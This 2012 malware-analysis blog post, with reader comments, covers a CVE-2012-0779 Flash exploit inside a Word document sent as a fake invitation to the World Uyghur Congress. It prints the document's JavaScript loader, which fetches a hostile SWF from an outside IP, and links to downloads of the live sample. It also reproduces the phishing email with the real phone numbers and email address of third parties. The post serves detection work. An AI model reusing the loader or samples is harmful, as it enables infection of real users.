Pages

Sunday, May 6, 2012

May 3 - CVE-2012-0779 World Uyghur Congress Invitation.doc



There are already quite a few samples of this recently patched exploit in the wild, including those targeting USA companies. This particular sample is targeting  Uyghur Congress, which is "an international organization aspiring to represent .. exiled Uyghur (Turkish ethnic group) people   both inside and outside of the Xinjiang Autonomous Region of the People's Republic of China." ~ Wikipedia. The text of the email cannot be translated with online translators, but judging by the content of the attachment, it is meant to look like an invitation for the World Uyghur Assembly .

More often than not, interesting samples come at the wrong time, when I cannot analyze them due to various reasons such as being busy with something else. I was planning to look at it this weekend but it did not happen, so here it CVE-2012-0779. Analyze it, write signatures, add detection to your filters. If you post an analysis, please send your link, I add. I will just post a few details about the file.


CVE Information




CVE-2012-0779
Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux; before 11.1.111.9 on Android 2.x and 3.x; and before 11.1.115.8 on Android 4.x allows remote attackers to execute arbitrary code via a crafted file, related to an "object confusion vulnerability," as exploited in the wild in May 2012.




File Information

File: WUC Invitation Letter Guests.doc
Size: 121872
MD5:  1750A38A44151493B675538A1AC2070B

Download

Download 1750A38A44151493B675538A1AC2070B  (email me if you need the password)
Download dropped file 6fe1634dce1d095d6b8a06757b5b6041  - thanks to Steven K

Also see here http://jsunpack.jeek.org/?report=48b3c77f602abc635f520eafb4690cc160e3acdd  - thanks to C0d3inj3ct

Action Script http://pastebin.com/fbPRL3ih




Original Message

主题: Norwegiyedin Toygha teklip qilinidighanlarning tizimligi
日期: Fri, 27 Apr 2012 11:46:02 +0800
收件人 XXXXXX
      
Salam

Xanim tönugun manga, Norwegiye rafto jemiyitidin Arne we ayalini Yapuniyede echilidighan qurultaygha teklip qilishimiz heqqide Dolqun bilen korushushumni we Dolqunning derhal ulargha teklipname ewetishini digenti. Bugun men Dolqun bilen bu toghrida korushtum. Dolqun, "teklipnamining nusxisini Zubeyrege ewetip bergen, uning ustige teklipnamege beribir Xanim qol qoyushi kerek bolghandikin, Amrekidinla ewetilgini yaxshi" deydu. Shunga ularning isim-familisini sizge ewettim. (sizde bar bolishi kerek, shundaq bolsimu ehtiyat yustidin)

Therese Jebsen
Executive Director of the Rafto Foundation
Phone:  +47 55 21 09 31
Mobile: +47 41 51 13 90
E-mail: therese.jebsen(a)rafto.no

Arne Liljedahl Lynngård

Rfto fondi jemitining sabiq bashlighi,(hazir ezasi)

Telefon: 55 24 42 02

Mobiltelefon : 95 15 22 90


Created Files

Clean decoy
Javascrpt to download
javascript:eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000%3E%3C/embed%3E')))


swf compressed
2b98d285c8b581855d59ac368956ee78


when you uncompress it you, you get
File: essais~.swf
Size: 9162
MD5:  76700F862A0C241B8F4B754F76957BDA

Ascii Strings:
---------------------------------------------------------------------------
frame1
_&Operated by DoSWF:http://www.doswf.com  <<DoSWF - Flash Encryption
Object
EventDispatcher
flash.events
DisplayObject
flash.display
InteractiveObject
DisplayObjectContainer
Sprite
MovieClip
_doswf_package.LoadingBarBase
Security
Dropped file (I don't have this one)
MD5: 6FE1634DCE1D095D6B8A06757B5B6041 
Application Data\Macromedia\Flash Player\#SharedObjects\temp.exe
Application Data\Macromedia\Flash Player\#SharedObjects\Flash_ActiveX.exe
Application Data\conime.exe

----------
Someone sent a partial SWF analysis - I added his SWF + decompiled Flash file inside the main download zip above
The included zip contains the second stage swf that is embedded in the main one,
and a copy of the decompiled script from it. The script originally had all the
functions and variables set to unicode strings, which have been renamed
for readability. The parameters passed into the top level swf from the doc file

info=789c333230d13331d53337d633b3b432313106001afa0338
infosize=00FC0000

info is the compressed host name, infosize is a variable used to configure the
shellcode and probably the offset in the parent doc file of the embedded exe.

Complete script contained in the doc file below..

eval(document.write(unescape('
%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001af
a0338&infosize=00FC0000%3E%3C/embed%3E')))

File: embedded.swf  Virustotal
Size: 6246
MD5:  847A9CFF5328F85015293BAD2F164F10




Traffic


GET /essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000 HTTP/1.1
Accept: */*
User-Agent: contype
Host: 204.45.73.69

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 7993
Accept-Ranges: bytes
Content-Disposition: filename="essais.swf";
Last-Modified: Wed, 25 Apr 2012 15:42:37 GMT


Automatic scans

SWF - Virustotal

Doc
https://www.virustotal.com/file/064c0e1b9157bfcaca62c2f06abd4b51aa289c1b1678c2688b1d7f36cc1335a8/analysis/
SHA256:     064c0e1b9157bfcaca62c2f06abd4b51aa289c1b1678c2688b1d7f36cc1335a8
SHA1:     4380b5336fa03554cbc5542a7460f7cc70adc8bb
MD5:     1750a38a44151493b675538a1ac2070b
File size:     119.0 KB ( 121872 bytes )
File name:     WUC Invitation Letter Guests.doc
File type:     MS Word Document
Detection ratio:     6 / 42
Analysis date:     2012-05-07 02:08:31 UTC ( 1 hour, 30 minutes ago )
BitDefender     Exploit.ScriptBridge.Gen     20120507
F-Secure     Exploit.ScriptBridge.Gen     20120507
GData     Exploit.ScriptBridge.Gen     20120507
Ikarus     Exploit.ScriptBridge     20120507
nProtect     Exploit.ScriptBridge.Gen     20120506


11 comments:

  1. oh , Mila, I just know you're the first to post this 0779
    NICE JOB !

    ReplyDelete
  2. It seems there's no password to the ZIP?

    ReplyDelete
  3. Dropped file (I don't have this one) MD5: 6FE1634DCE1D095D6B8A06757B5B6041 // got it, drop me a mail other than gmail who don't allow archive attachement if you want it ;)
    xylitol@malwareint.com

    ReplyDelete
    Replies
    1. Steven K , can you please send password to 'infotodo@yahoo.co.uk'

      Delete
  4. Search for the network pattern, "/upload/exp.swf" in Google. It will bring you to few examples of the compressed SWF files on jsunpack.

    One instance: http://jsunpack.jeek.org/?report=48b3c77f602abc635f520eafb4690cc160e3acdd

    Even though the malicious site on which this SWF file was hosted is down, you can still download the samples from jsunpack site.

    On a side note, a few of the compressed SWF files are of version 9 and others of version 14.

    ReplyDelete
  5. From the RDF MetaData of the decompressed SWF File:

    Encrypted by DoSWF
    Version:5.0.3
    Username:nxianguo1985@163.com.fr
    Index:http://www.doswf.com
    Author:http://www.laaan.cn

    ReplyDelete
  6. Does anyone know how to decrypt the DoSWF encryption of the decompressed swf file? Been looking for a tool, but no luck..

    ReplyDelete
  7. Hello man , you have action script code ? please post in blog

    ReplyDelete
  8. How was the embedded flash found? Since it is an encrypted flash file, how was the shellcode even seen as part of the code? Was it taken out of memory when the flash file was loaded? What flash tools used to extract the action script code in the pastebin link?

    ReplyDelete